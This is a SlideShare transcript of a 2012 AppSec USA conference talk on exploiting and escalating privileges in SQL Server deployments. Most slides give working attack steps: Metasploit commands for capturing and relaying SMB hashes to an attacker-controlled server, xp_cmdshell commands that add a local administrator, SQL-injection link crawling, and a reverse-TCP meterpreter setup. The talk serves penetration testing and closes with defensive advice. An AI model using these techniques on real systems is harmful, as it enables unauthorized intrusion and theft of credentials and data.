SlideShare une entreprise Scribd logo

SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

Scott Sutherland
Scott Sutherland

During this presentation attendees will be introduced to lesser known, yet significant vulnerabilities in SQL Server implementations related to common trust relationships, misconfigurations, and weak default settings. The issues that will be covered are often leveraged by attackers to gain unauthorized access to high value systems, applications, and sensitive data. An overview of each issue, common vectors of attack, and manual techniques will be covered. Finally newly created Metasploit modules and TSQL scripts will be demonstrated that help automate the attacks. This presentation will be valuable to penetration testers who are looking for faster ways to gain access to critical data and systems. Additionally, it should be worth while for developers and database administrators who are interested in gaining a better understanding of how to protect their applications and databases from these attacks. More security blogs by the authors can be found @ https://www.netspi.com/blog/

Technologie
1  sur  76
Télécharger pour lire hors ligne
SQL Server Exploitation, Escalation, and Pilfering AppSec USA 2012 Authors: Antti Rantasaari Scott Sutherland
Who are we? Antti Rantasaari Scott Sutherland (@_nullbind) What we do… • Security consultants at NetSPI • Pentesters ‒ Network ‒ Web ‒ Thick • Researchers, bloggers, etc • Pinball enthusiasts
What are we going to cover? 1. Database entry points 2. Domain user  Database user 3. Database user  OS admin 4. OS admin  Database admin 5. Database admin  OS admin 6. Finding sensitive data 7. Escalation: Service accounts 8. Escalation: Database Link Crawling 9. Conclusions
Why target SQL Servers? Pentest Goal = Data Access • It’s deployed everywhere • Very few “exploits”, but it’s commonly misconfigured • Integrated with Windows and Active Directory authentication • Easy and stable to exploit
Why develop Metasploit tools? • I suck at programming • Easy to use framework • Huge community support • Easy management of code (GitHub) • Easy distribution of code http://www.metasploit.com/ https://github.com/rapid7/metasploit-framework
Let’s get started!
Entry Points: Summary asef Unauthenticated Options • SQL injections • Weak passwords Authenticated Options (usually) • Other database servers • Unencrypted connection strings: ‒ Files ‒ Registry ‒ Network • ODBC connections • Client tools (priv inheritance)
DOMAIN user  DATABASE user Privilege Inheritance
Privilege Inheritance: Summary The “Domains Users” group is often provided privileges to login into SQL Servers… Evil users just need to: • Find SQL Servers • Verify Access • Attack!
Privilege Inheritance: Find SQL Servers Easy SQL Server Discovery = SQLPing v3.0 http://www.sqlsecurity.com/dotnetnuke/uploads/sqlping3.zip
Privilege Inheritance: Find SQL Servers Finding SQL Servers with osql:
Privilege Inheritance: Verify Access Test current user’s access to SQL Servers with osql: FOR /F “tokens=*” %i in (‘type sqlservers.txt’) do osql –E –S %i –Q “select ‘I have access to:’+@@servername”
Privilege Inheritance: Verify Access Test alternative user’s access to the SQL Servers with the MSSQL_SQL Metasploit module: msfconsole use auxiliary/admin/mssql/mssql_sql set RHOST <IP RANGE> set RPORT <port> set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> Set SQL <query> run http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_sql
Privilege Inheritance: Verify Access asef
Privilege Inheritance: Verify Access asef
DATABASE USER  OS ADMIN SMB Capture/Relay
SMB Capture/Relay: Summary SQL Server supports functions that can access files via UNC paths using the privileges of the SQL Server service account. High level authentication process:
SMB Capture/Relay: Summary Stored procedures with UNC support: ‒ *xp_dirtree ‒ *xp_fileexist ‒ xp_getfiledetails Possible SMB authentication attacks: Service Account Network Communication SMB Capture SMB Relay LocalSystem Computer Account Yes No NetworkService Computer Account Yes No *Local Administrator Local Administrator Yes Yes *Domain User Domain User Yes Yes *Domain Admin Domain Admin Yes Yes http://erpscan.com/press-center/smbrelay-bible-2-smbrelay-by-ms-sql-server/ http://www.netspi.com/blog/2010/07/01/invisible-threats-insecure-service-accounts/
SMB Capture: Diagram
SMB Capture: Start Sniffing for Hashes Start Metasploit SMB capture module on your evil server to capture seeded password hashes: msfconsole use auxiliary/server/capture/smb set CAINPWFILE /root/cain_hashes.txt set JOHNPWFILE /root/john_hashes.txt exploit http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Force MS SQL to Auth Force SQL Server to authenticate with the modules: MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
SMB Capture: Obtain Seeded Hashes Obtaining service account hashes from the SQL Server should look something like this: DOMAIN: DEMO USER: serviceaccount LMHASH:5e17a06b538a42ae82273227fd61a5952f85252cc731bb25 NTHASH:763aa16c6882cb1b99d40dfc337b69e7e424d6524a91c03e http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Capture: Crack Hashes 1. Crack first half of recovered LANMAN hash with seeded half LM Rainbow Tables: rcracki_mt -h 5e17a06b538a42ae ./halflmchall 2. Crack the second half with john the ripper to obtain case sensitive NTLM password. perl netntlm.pl --seed GPP4H1 --file /root/john_hashes.txt http://www.metasploit.com/modules/auxiliary/server/capture/smb http://www.packetstan.com/2011/03/nbns-spoofing-on-your-way-to-world.html
SMB Relay: Diagram Very high level overview: http://en.wikipedia.org/wiki/SMBRelay
SMB Relay: Setup SMBProxy for Relay SMB Relay to 3rd Party with the SMB_Relay Metasploit exploit module: msfconsole use exploit/windows/smb/smb_relay set SMBHOST <targetserver> exploit If the service account has the local admin privileges on the remote system, then a shell will be returned by the smb_relay module http://www.metasploit.com/modules/exploit/windows/smb/smb_relay
SMB Relay: Force MS SQL to Auth Force SQL Server to authenticate with the modules MSSQL_NTLM_STEALER or MSSQL_NTLM_STEALER_SQLI Msfconsole use auxiliary/admin/mssql/mssql_ntlm_stealer set USE_WINDOWS_AUTHENT true set DOMAIN <domain> set USERNAME <user> set PASSWORD <password> set RHOSTS <IP RANGE> set RPORT <port> Set SMBPROXY <evil server> run
SMB Relay: Get Meterpreter Shells
SMB Capture/Relay: Using PW or Shell If meterpreter then: • Type: shell • Type: osql –E –Q “what ever you want” If password: • Sign in via RDP • Open a cmd console • osql –E –Q “what ever you want”
DEMO
Do a crazy dance! BALLET = NOT CRAZY DANCING FLY = TOTALLY CRAZY
OS ADMIN  DATABASE ADMIN SQL Server Local Authorization Bypass
Local Auth Bypass: Summary How can we go from OS admin to DB admin? • SQL Server 2000 to 2008 ‒ LocalSystem = Sysadmin privileges • SQL Server 2012 ‒ Must migrate to SQL Server service process for Sysadmin privileges
Local Auth Bypass: Summary Transparent Encryption = Mostly Useless (unless local hard drive encryption is in place and key management is done correctly)
Local Auth Bypass: Psexec On SQL Server 2000 to 2008 Execute queries as sysadmin with osql: psexec –s cmd.exe osql –E –S “localhostsqlexpress” –Q “select is_srvrolemember(‘sysadmin’)” Execute queries as sysadmin with SSMS: psexec –i –s ssms http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx
Local Auth Bypass: Get Shell Obtain Meterpreter shell using the PSEXEC module msfconsole use exploit/windows/smb/psexec set RHOST <targetserver> set SMBDOMAIN . set SMBUSER <user> set SMBPASS <password> exploit http://www.metasploit.com/modules/exploit/windows/smb/psexec
Local Auth Bypass: Get Sysadmin Create sysadmin in database using the Metasploit mssql_local_auth_bypass post module: In Meterpeter type “background” to return to msconsole. Then, in the msfconsole type: use post/windows/manage/mssql_local_auth_bypass set session <session> set DB_USERNAME <username> set DB_PASSWORD <password> exploit http://www.metasploit.com/modules/post/windows/manage/mssql_local_auth_bypass
SQL Server Auth Bypass: Got Sysadmin asef
Do a crazy whale dance! To the left… To the right… Now dive!
DATABASE ADMIN  OS ADMIN xp_cmdshell
XP_CMDSHELL: Summary XP_CMDSHELL = OS COMMAND EXEC Yes. We know you already know this, but don’t forget…
XP_CMDSHELL: Re-Install Re-install xp_cmdshell EXEC master..sp_addextendedproc "xp_cmdshell", "C:Program FilesMicrosoft SQL ServerMSSQLBinnxplog70.dll";
XP_CMDSHELL: Re-Enable Re-enable xp_cmdshell sp_configure ‘show advanced options’, 1; reconfigure; go; sp_configure ‘xp_cmdshell’, 1; reconfigure; go;
XP_CMDSHELL: Execute Commands Add Local OS Administrator with xp_cmdshell EXEC master..xp_cmdshell ‘net user myadmin MyP@sword1’ EXEC master..xp_cmdshell ‘net localgroup administrators /add myadmin’
FINDING DATA
Finding Data: Summary GOAL = Find sensitive data! • Credit cards • Social security number • Medical records
Finding Data: TSQL Script Simple keywords search via TSQL! EXEC master..sp_msforeachdb 'SELECT @@Servername as Server_Name,''[?]'' as Database_name,Table_Name,Column_Name FROM [?].INFORMATION_SCHEMA.COLUMNS WHERE Column_Name LIKE ''%password%'' OR Column_Name LIKE ''%Credit%'' OR Column_Name LIKE ''%CCN%'' OR Column_Name LIKE ''%Account%'' OR Column_Name LIKE ''%Social%'' OR Column_Name LIKE ''%SSN%'' ORDER BY Table_name'
Finding Data: Metasploit Module Database scraping with the mssql_findandsampledata module! Features • Scan multiple servers • Authenticate with local Windows, Domain or SQL credentials • Sample data • Number of records found • Output to screen and CSV file http://www.metasploit.com/modules/auxiliary/admin/mssql/mssql_findandsampledata
Finding Data: Metasploit Module Launching mssql_findandsampledata: msfconsole use auxiliary/admin/mssql/mssql_findandsampledata set RHOSTS <range> set RPORT <port> setg USE_WINDOWS_AUTHENT true setg DOMAIN <CompanyDomain> set USERNAME <username> set PASSWORD <password> set SAMPLE_SIZE <size> set KEYWORDS credit|social|password exploit
Finding Data: Module Output asef
Finding Data: Demo DEMO
Do a crazy cat disco dance!
Escalation: Service Accounts
Shared Service Accounts: Summary XP_CMDSHELL + Shared Service Accounts + OSQL -E = (more) Unauthorized DATA access
Shared Service Accounts: Diagram asef
Shared Service Accounts: TSQL Script XP_CMDSHELL + OSQL = MORE ACCESS! EXEC master..xp_cmdshell ‘osql –E –S HVA –Q “select super.secret.data”’ More examples: http://www.netspi.com/blog/2011/07/19/when-databases-attack-hacking- with-the-osql-utility/
Escalation: Database Link Crawling
Database Link Crawling: Summary Database Links • Allow one database server to query another • Often configured with excessive privileges • Can be chained together • Use openquery() to query linked servers • Can be used to execute the infamous xp_cmdshell • Tons of access, no credentials required (via SQL injection)
Database Link Crawling: Diagram asef
Database Link Crawling: List Links How do I list linked servers? Two common options: sp_linkedservers and SELECT srvname FROM master..sysservers
Database Link Crawling: List Links How do I list linked servers on a linked server? SELECT srvname FROM openquery(DB1, 'select srvname FROM master..sysservers')
Database Link Crawling: List Links How do I list linked servers on the linked server’s linked server? SELECT srvname FROM openquery(DB1,'SELECT srvname FROM openquery(HVA,''SELECT srvname FROM master..sysservers'')')
Database Link Crawling: You Get it! ….You get the point You can follow links until you run out 
Database Link Crawling: Exec Cmds How do I run commands on a linked server? SELECT * FROM openquery(DB1,’SELECT * FROM openquery(HVA,’’SELECT 1;exec xp_cmdshell ‘’’’ping 192.168.1.1’’’’ ‘’)’)
Database Link Crawling: Modules Two Modules 1. Direct connection 2. SQL Injection Available for Download • Not submitted to Metasploit trunk – Yet • Downloads available from nullbind’s github ‒ mssql_linkcrawler.rb ‒ mssql_linkcrawler_sqli.rb
Database Link Crawling: Modules • Features ‒ Crawl SQL Server database links ‒ Standard Crawl output ‒ Verbose Crawl output ‒ Output to CSV file ‒ Supports 32 and 64 bit Windows ‒ Global Metasploit payload deployment ‒ Targeted Metasploit payload deployment ‒ Payload deployment via powershell memory injection
Metasploit Module: Run multi/handler Setup the multi/handler module: use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 0.0.0.0 set lport 443 set ExitOnSession false exploit -j -z
Metasploit Module: Link Crawler Setup the mssql_linkcrawler_sqli module: use exploit/windows/mssql/mssql_linkcrawler_sqli set GET_PATH /employee.asp?id=1;[SQLi];-- set type blind set RHOST 192.168.1.100 set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.130 set lport 443 set DisablePayloadHandler true exploit
Database Link Crawling: Attack! asef
Database Link Chaining: Demo DEMO
Do a crazy cat disco dance! Yes. It warrants 2 disco cats!
Database Link Chaining: Modules Current Constraints • Cannot crawl through SQL Server 2000 • Cannot enable xp_cmdshell through links • Cannot deliver payloads to systems without powershell (at the moment) • Currently, the module leaves a powershell process running on exit • Currently, doesn’t allow arbitrary query execution on linked servers
Conclusions configure all accounts with LEAST PRIVILEGE system accounts service accounts database accounts application accounts
Conclusions always VALIDATE INPUT web apps thick apps mobile apps web services
Conclusions Configure SMB SIGNING
Conclusions don’t do DRUGS
Questions Antti Rantasaari Email: antti.rantasaari@netspi.com Scott Sutherland Email: scott.sutherland@netspi.com Blog: http://www.netspi.com/blog/author/ssutherland/ Github: http://www.github.com/nullbind/ Twitter: @_nullbind Presentation Slides http://www.slideshare.net/nullbind/sql-serverexploitationescalationandpilferingapp- secusa2012

Recommandé

Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingAmine SAIGHI
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Michael Gough
 
Ransomware Resistance
Ransomware ResistanceRansomware Resistance
Ransomware ResistanceFlorian Roth
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE - ATT&CKcon
 
Penetration Testing AWS
Penetration Testing AWSPenetration Testing AWS
Penetration Testing AWSSanjeev Kumar Jaiswal
 
ATT&CK Updates- Defensive ATT&CK
ATT&CK Updates- Defensive ATT&CKATT&CK Updates- Defensive ATT&CK
ATT&CK Updates- Defensive ATT&CKMITRE ATT&CK
 

Recommandé

Introduction to penetration testing
Introduction to penetration testingIntroduction to penetration testing
Introduction to penetration testingAmine SAIGHI
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Detecting WMI Exploitation v1.1
Detecting WMI Exploitation v1.1Michael Gough
 
Ransomware Resistance
Ransomware ResistanceRansomware Resistance
Ransomware ResistanceFlorian Roth
 
Introduction to red team operations
Introduction to red team operationsIntroduction to red team operations
Introduction to red team operationsSunny Neo
 
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITRE
MITRE ATT&CKcon 2.0: State of the ATT&CK; Blake Strom, MITREMITRE - ATT&CKcon
 
Penetration Testing AWS
Penetration Testing AWSPenetration Testing AWS
Penetration Testing AWSSanjeev Kumar Jaiswal
 
ATT&CK Updates- Defensive ATT&CK
ATT&CK Updates- Defensive ATT&CKATT&CK Updates- Defensive ATT&CK
ATT&CK Updates- Defensive ATT&CKMITRE ATT&CK
 
Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 
Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guideSudhanshu Chauhan
 
Okta docs
Okta docsOkta docs
Okta docsSam Bauch
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Building a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphBuilding a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphVaticle
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Risk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksRisk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksMarco Morana
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideMITRE ATT&CK
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Digit Oktavianto
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Teymur Kheirkhabarov
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Jorge Orchilles
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 
STIX2-TAXII2_Update
STIX2-TAXII2_UpdateSTIX2-TAXII2_Update
STIX2-TAXII2_UpdateCyber Threat Intelligence Network (CTIN)
 
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingScott Sutherland
 

Contenu connexe

Tendances

Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Daniel Bohannon
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacksMichael Gough
 
Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guideSudhanshu Chauhan
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Building a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphBuilding a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphVaticle
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Umesh Mahawar
 
Risk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksRisk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksMarco Morana
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideMITRE ATT&CK
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureSergey Soldatov
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3Shawn Croswell
 
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Digit Oktavianto
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onSplunk
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Jorge Orchilles
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2Scott Sutherland
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with SplunkSplunk
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beau Bullock
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0Michael Gough
 

Tendances (20)

Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016Invoke-Obfuscation DerbyCon 2016
Invoke-Obfuscation DerbyCon 2016
 
You can detect PowerShell attacks
You can detect PowerShell attacksYou can detect PowerShell attacks
You can detect PowerShell attacks
 
Web application penetration testing lab setup guide
Web application penetration testing lab setup guideWeb application penetration testing lab setup guide
Web application penetration testing lab setup guide
 
Okta docs
Okta docsOkta docs
Okta docs
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs Blue
 
Building a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge GraphBuilding a Cyber Threat Intelligence Knowledge Graph
Building a Cyber Threat Intelligence Knowledge Graph
 
Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)Ethical Hacking PPT (CEH)
Ethical Hacking PPT (CEH)
 
Risk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware AttacksRisk Analysis Of Banking Malware Attacks
Risk Analysis Of Banking Malware Attacks
 
ATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue DivideATT&CKing the Red/Blue Divide
ATT&CKing the Red/Blue Divide
 
Hunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows InfrastructureHunting Lateral Movement in Windows Infrastructure
Hunting Lateral Movement in Windows Infrastructure
 
kill-chain-presentation-v3
kill-chain-presentation-v3kill-chain-presentation-v3
kill-chain-presentation-v3
 
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...Adversary Emulation and Its Importance for Improving Security Posture in Orga...
Adversary Emulation and Its Importance for Improving Security Posture in Orga...
 
Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7Kheirkhabarov24052017_phdays7
Kheirkhabarov24052017_phdays7
 
Threat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-onThreat Hunting with Splunk Hands-on
Threat Hunting with Splunk Hands-on
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
 
WTF is Penetration Testing v.2
WTF is Penetration Testing v.2WTF is Penetration Testing v.2
WTF is Penetration Testing v.2
 
Threat Hunting with Splunk
Threat Hunting with SplunkThreat Hunting with Splunk
Threat Hunting with Splunk
 
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
Beyond the Pentest: How C2, Internal Pivoting, and Data Exfiltration Show Tru...
 
MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0MITRE AttACK framework it is time you took notice_v1.0
MITRE AttACK framework it is time you took notice_v1.0
 
STIX2-TAXII2_Update
STIX2-TAXII2_UpdateSTIX2-TAXII2_Update
STIX2-TAXII2_Update
 

En vedette

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellScott Sutherland
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration TestingScott Sutherland
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsScott Sutherland
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)Scott Sutherland
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack webhostingguy
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial EmulationScott Sutherland
 

En vedette (6)

DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShellDerbyCon2016 - Hacking SQL Server on Scale with PowerShell
DerbyCon2016 - Hacking SQL Server on Scale with PowerShell
 
WTF is Penetration Testing
WTF is Penetration TestingWTF is Penetration Testing
WTF is Penetration Testing
 
Secure360 - Extracting Password from Windows
Secure360 - Extracting Password from WindowsSecure360 - Extracting Password from Windows
Secure360 - Extracting Password from Windows
 
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
2016 aRcTicCON - Hacking SQL Server on Scale with PowerShell (Slide Updates)
 
SQL Server Security - Attack
SQL Server Security - Attack SQL Server Security - Attack
SQL Server Security - Attack
 
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
2017 Q1 Arcticcon - Meet Up - Adventures in Adversarial Emulation
 

Similaire à SQL Server Exploitation, Escalation, Pilfering - AppSec USA 2012

TROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsTROOPERS 20 - SQL Server Hacking Tips for Active Directory Environments
TROOPERS 20 - SQL Server Hacking Tips for Active Directory EnvironmentsScott Sutherland
 
Windows Attacks AT is the new black
Windows Attacks AT is the new blackWindows Attacks AT is the new black
Windows Attacks AT is the new blackRob Fuller
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new blackChris Gates
 
Architecting cloud
Architecting cloudArchitecting cloud
Architecting cloudTahsin Hasan
 
TrinityCore server install guide
TrinityCore server install guideTrinityCore server install guide
TrinityCore server install guideSeungmin Shin
 
Drupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsDrupal, Memcache and Solr on Windows
Drupal, Memcache and Solr on WindowsAlessandro Pilotti
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
Security features In MySQL 8.0
Security features In MySQL 8.0Security features In MySQL 8.0
Security features In MySQL 8.0Mydbops
 
2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQL2019 Blackhat Booth Presentation - PowerUpSQL
2019 Blackhat Booth Presentation - PowerUpSQLScott Sutherland
 
Whitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxWhitepaper MS SQL Server on Linux
Whitepaper MS SQL Server on LinuxRoger Eisentrager
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
Low Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureLow Hanging Fruit, Making Your Basic MongoDB Installation More Secure
Low Hanging Fruit, Making Your Basic MongoDB Installation More SecureMongoDB
 
MySQL database replication
